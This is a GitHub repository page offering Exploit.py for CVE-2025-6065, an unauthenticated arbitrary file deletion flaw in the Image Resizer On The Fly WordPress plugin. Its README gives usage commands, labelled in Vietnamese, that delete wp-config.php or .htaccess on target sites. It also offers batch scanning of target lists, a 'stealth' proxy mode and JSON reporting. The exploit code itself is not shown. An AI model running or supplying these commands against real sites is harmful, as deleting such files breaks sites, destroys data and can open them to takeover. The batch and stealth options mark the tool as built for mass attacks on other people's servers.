Skip to content
/ CVE_2025_6065 Public

Image Resizer On The Fly plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'delete' task in all versions up to, and including, 1.1. This makes it possible for unauthenticated attackers to delete arbitrary files on the server

yuri08loveelaina.github.io
1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Yuri08loveElaina/CVE_2025_6065

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
Exploit.py
Exploit.py
 
 
README.md
README.md
 
 

Repository files navigation

  • 🧪 Cách sử dụng cơ bản: python3 Exploit.py --url https://target.com --cmd wp-config.php
  • 🔍 Chế độ kiểm tra plugin: python3 Exploit.py --url https://target.com --check-only
  • 📂 Chế độ batch scan: python3 Exploit.py --file targets.txt --cmd wp-config.php
  • targets.txt ví dụ:
  • 🕵️‍♂️ Chế độ stealth + Proxy: python3 Exploit.py --url https://target.com --cmd .htaccess --stealth --proxy http://127.0.0.1:8080
  • 🧾 Xuất kết quả ra JSON: python3 Exploit.py --file targets.txt --cmd wp-config.php --json-output result.json

About

Image Resizer On The Fly plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'delete' task in all versions up to, and including, 1.1. This makes it possible for unauthenticated attackers to delete arbitrary files on the server

yuri08loveelaina.github.io

Topics

cve-scanning cve-exploit cve-2025 cve-2025-6065

Resources

Readme
Activity

Stars

1 star

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages